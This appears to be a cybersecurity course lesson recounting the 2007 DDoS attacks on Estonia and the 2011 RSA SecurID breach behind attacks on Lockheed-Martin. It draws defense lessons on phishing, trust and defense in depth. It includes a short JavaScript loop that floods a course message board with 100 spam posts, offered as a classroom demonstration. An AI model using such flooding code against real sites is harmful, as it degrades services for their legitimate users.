In this lesson, we'll look more in depth at two different cyber attacks.

Statue commemorating Soviet WWII soldiers that was moved by the Estonian government, sparking attacks.
(from wired.com article)

2007 Take-down of Estonia: DDoS at the level of a nation

Estonia is a small Baltic country that used to be part of the Soviet Union. On April 27th, 2007, the Estonian government moved a Soviet-era memorial to the Soviet soldiers that fought in WWII from a prominent location in downtown Tallinn to a military cemetery in the suburbs. This was a very contentious issue between Estonia and Russia. In the days that followed, Estonian institutions, both governmental and non-governmental, were targeted by a wave of cyber attacks — predominantly DDoS attacks. This was really an attack on the network infrastructure of the whole nation.

Some of the attacks were carried out by "script kiddies", meaning users who are not particularly knowledgeable about hacking but who blindly follow instructions on hacker websites to carry out attacks. For example they might copy a script that sends thousands of ping requests a second to a host. If that host is providing service as a DNS or web server, it might stay so busy responding to pings that it can't provide its service. Chat rooms provided a means to encourage script kiddies to attack, to coordinate the attacks, and to give instructions on how to carry out attacks. For example, the Wired article below quotes this post from a Russian online forum: "You do not agree with the policy of eSStonia??? You may think you have no influence on the situation??? You CAN have it on the Internet!"

Another kind of DDoS attack was carried out on, for example, the Postimees (www.postimees.ee), an Estonian newspaper/website. The website has message boards, and the attackers had scripts that posted spam to the message boards. This kept legitimate users out, clogged up the message boards with garbage, and ultimately brought down the site's servers. We can actually carry out this kind of attack on rona and the instructor message boards. It's quite illustrative. The instructions below tell you how to instantly post 100 new spam messages to the message board.

var i = 0;
while(i < 100)
{
  i = i + 1;

  // Make a silly random message
  var words=["the","rain","in","Spain","falls","mainly","on","the","plain"];
  var msg = "";
  var j = 0; while(j < 30) { msg = msg + words[Math.floor(Math.random()*9)%9]+" "; j = j + 1; }
  
  // Posts message to message board without navigating to the message board
  try 
  {
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open("GET", "http://rona.cs.usna.edu/~wcbrown/msg/mb.cgi?msg="+msg,true);
    xmlhttp.send(null)
  } catch (e)  
  {
    xmlhttp=false;
  }
}

More serious than the script kiddies in the attacks on Estonia, there were attacks from Botnets, large collections of zombies, which are hosts that have been compromised by an attacker, but just function as usual until they receive the command to start whatever malicious activity is required by their masters. In this case, the botnets were used to perform DDoS attacks. The Wired article reports that in one day there were over 58 separate botnet attacks on Estonian targets. Estonia was being attacked by large numbers of hosts from Egypt, Vietnam and Peru ... not countries with a traditional interest in Estonian politics. These hosts were in fact simply zombies in a botnet.

In the face of something like this, what can be done? Since the attacks are coming from all over the world, the only thing that Estonia could do on its own was to sever its connections to the rest of the world. This is, obviously, a disaster. To address the problem in an acceptable way required the cooperation of many players outside of Estonia. The botnet IPs needed to be identified and packets from them filtered out not at their target, Estonia, because it was an overwhelming amount of traffic at that point, but closer to their sources. ISPs around the world would have to agree to filter out traffic from the attacking IP addresses that fell within their corner of the Internet. The Wired article has an interesting section describing how that happened.

References

1. article Hackers Take Down the Most Wired Country in Europe, Wired, August 21, 2007.
   
2. article A look at Estonia's cyber attack in 2007, MSNBC, July 8, 2009.
   
3. article Estonia readies for the next cyberattack, Computerworld, April 7, 2010.
   

2011 Attack on Lockheed-Martin

SecurID Key Fob

This OTP two-factor authentication system is really just another instance of defense in depth. Stealing a person's password isn't enough, you've got to steal their key fob, which is a physical thing-you-have. Thus, even if a bad guy has a key-logger on your computer, he can't really authenticate because, while he'll see your password and he'll see the number you typed in from your key fob, that number isn't valid when he tries to login with your stolen credentials. On the other hand ...

The email used in the RSA attack (from wired.com). Mouseover to enlarge.

In March of 2011, someone attacked RSA with a relatively unsophisticated Phishing attack. Would you open the attachment from the e-mail shown on the right? The attachment is an Excel file, and it has embedded code that exploited a zero-day vulnerability in Adobe Flash in order to set up a backdoor — a way for the attackers to get into the computer. With this access, the attackers were able to ultimately steal from RSA the seed values of we're-not-sure-how-many SecurID key fobs. [Note: RSA has not, as far as I'm aware, admitted that any seed values were stolen. However, there seems to be overwhelming evidence that they were.] While RSA admitted that the attack took place at the time, they wouldn't specify what if anything had been compromised, and they claimed that the attack would not allow a "direct attack" on SecurID. Presumably their rationale was that the seed values alone weren't enough to attack authentication, because you would have to be able to match the seed value with a particular account, i.e. you'd have to know the system it was used to login to and username on that system for the individual with the key fob. If this was their logic, it was flawed, as we will see below. Either that, or they were playing semantic games with the phrase "direct attack".


Notice the overlap with many of the aspects of security we have addressed in this course:

• Phishing: employee action (opening an email attachment) inadvertently let the attackers in.
• Zero-day: an Adobe Flash buffer overflow vulnerability was exploited.
• Trojan: the exploit allowed a key logger to be installed (PoisonIvy).
• Authentication compromised: unprivileged credentials were obtained.
• Privilege escalation: sysadmin and service account credentials obtained.
• Encryption: stolen data was encrypted by the attackers!
• Conclusion: attackers deleted files to destroy evidence of the attack.

Lockheed-Martin claims to have recognized very quickly that their authentication was compromised and taken steps to secure their system. In particular they said that no important data was lost. Whether to believe that is up to you. The problem is that, as with RSA, companies do not like to confess that they've been hacked or that a breach is serious. At least two other companies were attacked this same way using the stolen RSA seed values. RSA was forced to admit that the seed values had indeed been stolen, and decided it would replace every one of the SecurID tokens (key fobs and other similar devices). All 40 million of them. There are some very interesting aspects of this attack that are worth thinking about.

• Trust — Lockheed-Martin was relying not only on the security of RSA's product (SecurID), but also on the security of RSA's own IT infrastructure and it's ability to protect the seed values. Its trust in the security of RSA's own IT infrastructure was evidently misplaced. In general, one has to be careful about trust, and minimize the trust you are forced to place in the security of other entities to maintain your own security.
  "I think one of the things that this incident shows us is that a business model where an enterprise is trusting a third party to hold their seeds is potential very risky. There's a certain amount of risk that they have to calculate. If you're a small organization or don't have the resources to do it better in-house, you're going to probably go that route. If you're a large organization, you might want to look to other alternatives. There are other models where you don't have to give your seeds to someone else." — Rick Moy, CEO of NSS Labs, [7]
• Defense-in-Depth — This story demonstrates, once again, that a single line of defense is a bad design, no matter how hard you try to secure that line completely and perfectly. If Lockheed-Martin is indeed being forthcoming, they had other measures in place that discovered and/or thwarted this attack. In other words they had defense in depth. So, if you like, the fact that the attackers got a keylogger on a system inside Lockheed-Martin and still weren't able to do any real damage is a positive.
  "Much of the concern has to do with this lingering tendency to see security in black-and-white terms: We are either secure, or we're not. The tendency to see security in black-and-white terms may also tend towards 'betting the farm' thinking, where one defense tactic or another is seen as critical." — Scott Crawford, analyst for Enterprise Management Associates, [7]
  "The traditional OTP [One Time Password] approach only provides a single layer of protection at the perimeter, which APTs [Advanced Persistent Threats] can get around. To secure your environment against these hacks, customers need to look at a multilayered approach, protecting at different points within the network." — Chris Harget, senior product marketing manager at ActivIdentity, [7]
• Evolving Threats — The complexity of carrying out this attack was considerable. The perpetrators had to break into systems in at least two different organizations, both of which take security seriously. They had to actually find their way to the seed values at RSA, and then have the necessary understanding of the seed+time-to-OTP algorithm to find the proper seed for the user at Lockheed-Martin they'd attacked. The sophistication of the attack and nature of the targets make corporate or government espionage seem likely. This is not the teenage hacker in the basement of his parents house scenario.
  "Malware has evolved from a trivial, script-kiddie nuisance, to a professional crime syndicate, and now into a tool for precision corporate and government espionage." — Tony Bradley, a PC World columnist. [2]

References

1. article Lockheed Martin Suffers Massive Cyberattack, InformationWeek, May 31, 2011.
   
2. article How bad was the cyber attack on Lockheed Martin? Christian Science Monitor, May 29, 2011.
   
3. article RSA Details SecurID Attack Mechanics, InformationWeek, April 04, 2011.
   
4. article RSA finally comes clean: SecurID is compromised, ARSTechnica, June 2011.
   
5. article Researchers Uncover RSA Phishing Attack, Hiding in Plain Sight, Wired, August 26, 2011 .
   
6. article After the Cyber Attack on Lockheed Martin, What's the Future of RSA SecurID? Popular Mechanics, June 3, 2011.
   
7. article Gauging The Long-Term Effects Of RSA's Breach Dark Reading, Nov 14, 2011.
   
8. article China Hacked RSA, U.S. Official Says Dark Reading, Mar 29, 2012.

And so on and so forth ...